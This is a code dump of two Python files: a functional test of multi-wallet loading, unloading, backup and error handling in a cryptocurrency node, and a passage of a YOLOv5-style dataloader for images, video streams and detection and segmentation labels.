# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Ludirium Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a ludiriumd node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import LudiriumTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
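# Helper for the concurrent-loading test below: several threads repeatedly load and
# unload the same wallet until one call races another and the node returns the
# "Wallet already loading" error (code -4), which the test then asserts was observed.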
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(LudiriumTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another ludiriumd?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another ludiriumd?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2")
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
mixed_datasets.py
|
import glob
import hashlib
import logging
import math
import os
import random
import shutil
import time  # used by LoadStreams.update
from itertools import repeat
from multiprocessing.dummy import Pool as ThreadPool
from pathlib import Path
from threading import Thread  # used by LoadStreams to read streams in the background
from typing import List, Tuple
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import torch.utils.data as torch_data
from PIL import ExifTags, Image
from torch.utils.data import Dataset
from tqdm import tqdm
from .general import check_requirements, clean_str, init_seeds, resample_segments,\
segment2box, segments2boxes, xyn2xy, xywh2xyxy,\
xywhn2xyxy, xyxy2xywh, seg_xyn2xy, generate_seg_labels_img
from .torch_utils import torch_distributed_zero_first
# Parameters
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo']  # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv']  # acceptable video suffixes
NUM_THREADS = min(8, os.cpu_count() or 1)  # number of multiprocessing threads
# Get the numeric EXIF key of the 'Orientation' tag
orientation = next(filter(lambda item: item[1] == 'Orientation', ExifTags.TAGS.items()))[0]
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = 0
for p in paths:
p = Path(p)
if p.is_file():
size += p.stat().st_size
elif p.is_dir():
size += sum([t.stat().st_size for t in p.glob('*.*')])
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
    # Return the EXIF-corrected PIL image size as (width, height)
    s = img.size  # (width, height)
    try:
        rotation = img.getexif()[orientation]
        if rotation in [6, 8]:  # EXIF orientations 6 and 8 are 90/270-degree rotations, so swap width and height
            s = (s[1], s[0])
    except:
        pass
    return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
rotation = exif.get(orientation, 1) # default 1
if rotation > 1:
method = {
2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90
}.get(rotation)
if method is not None:
image = image.transpose(method)
del exif[orientation]
image.info["exif"] = exif.tobytes()
return image
def create_mixed_dataloader(path, imgsz, batch_size, stride, single_cls, hyp=None, augment=False, pad=0.0, rect=False,
rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
    # Make sure the DDP main process loads the dataset first, so the other processes can reuse its cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
    nw = min([NUM_THREADS, batch_size if batch_size > 1 else 0, workers])  # number of dataloader workers
sampler = torch_data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch_data.DataLoader if image_weights else InfiniteDataLoader
# loader = torch_data.DataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
drop_last=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
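# Minimal usage sketch (hypothetical path and hyperparameter dict, for illustration
# only; the real call sites live in the training scripts):
#   dataloader, dataset = create_mixed_dataloader('data/train', imgsz=640, batch_size=16,
#                                                 stride=32, single_cls=False, hyp=hyp,
#                                                 augment=True, rank=-1, workers=8,
#                                                 prefix='train: ')
#   for batch in dataloader:
#       ...  # one training step per batch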
class InfiniteDataLoader(torch_data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for _ in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
print(f'{i + 1}/{n}: {s}... ', end='')
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
print(f" success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
print('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] *= 0
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
    de_labels: List[str] = []  # label paths for object detection
    se_labels: List[str] = []  # label paths for semantic segmentation
for x in img_paths:
x = Path(x)
f_name = x.with_suffix('.txt').name
de_parent = x.parent.parent.with_name('DeLabels') / x.parent.name
de_labels.append(str(de_parent / f_name))
se_parent = x.parent.parent.with_name('SeLabels') / x.parent.name
se_labels.append(str(se_parent / f_name))
return de_labels, se_labels
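# Example of the directory layout this mapping assumes (hypothetical paths): an image at
#   /data/Images/train/0001.jpg
# resolves to the detection label    /data/DeLabels/train/0001.txt
# and the segmentation label         /data/SeLabels/train/0001.txt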
class LoadImagesAndLabels(Dataset): # for training/testing
cache_version = 0.5 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.batch_size = batch_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
        self.mosaic = self.augment and not self.rect  # load 4 images at a time into a single mosaic image (training only)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.pad = pad
self.path = path
p = None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p)
if p.is_dir(): # dir
f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with p.open('r') as t:
t = t.read().strip().splitlines()
f += [p.parent / x.lstrip(os.sep) for x in t] # lacal to global path
else:
raise Exception(f'{prefix}{p} 不存在')
self.img_files = sorted([str(x) for x in f if x.suffix[1:].lower() in IMG_FORMATS])
assert self.img_files, f'{prefix}no images found'
except Exception as e:
raise Exception(f'{prefix}error loading data from {path}: {e}')
# Check cache
assert isinstance(p, Path)
self.de_label_files, self.se_label_files = img2label_paths(self.img_files)
cache_parent = p.parent.parent if p.is_file() else Path(self.de_label_files[0]).parent.parent.parent
cache_name = (p if p.is_file() else Path(self.de_label_files[0]).parent).with_suffix('.cache').name
cache_path = cache_parent / cache_name
if cache_path.is_file():
cache, exists = torch.load(cache_path), True
if cache['hash'] != get_hash(self.de_label_files + self.se_label_files + self.img_files): # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache results
nf, nm, ne, nc, nu = cache.pop('results') # found, missing, empty, corrupted, used
if exists:
d = f"Scanned images and labels in '{cache_path}'... {nf} found, {nm} missing, {ne} empty, {nc} corrupt, {nu} used"
tqdm(None, desc=prefix + d, total=nu, initial=nu) # display cache results
if cache['msgs']:
logging.info('\n'.join(cache['msgs'])) # display warnings
assert nu > 0 or not augment, f'{prefix}no labels found in {cache_path}, cannot train'
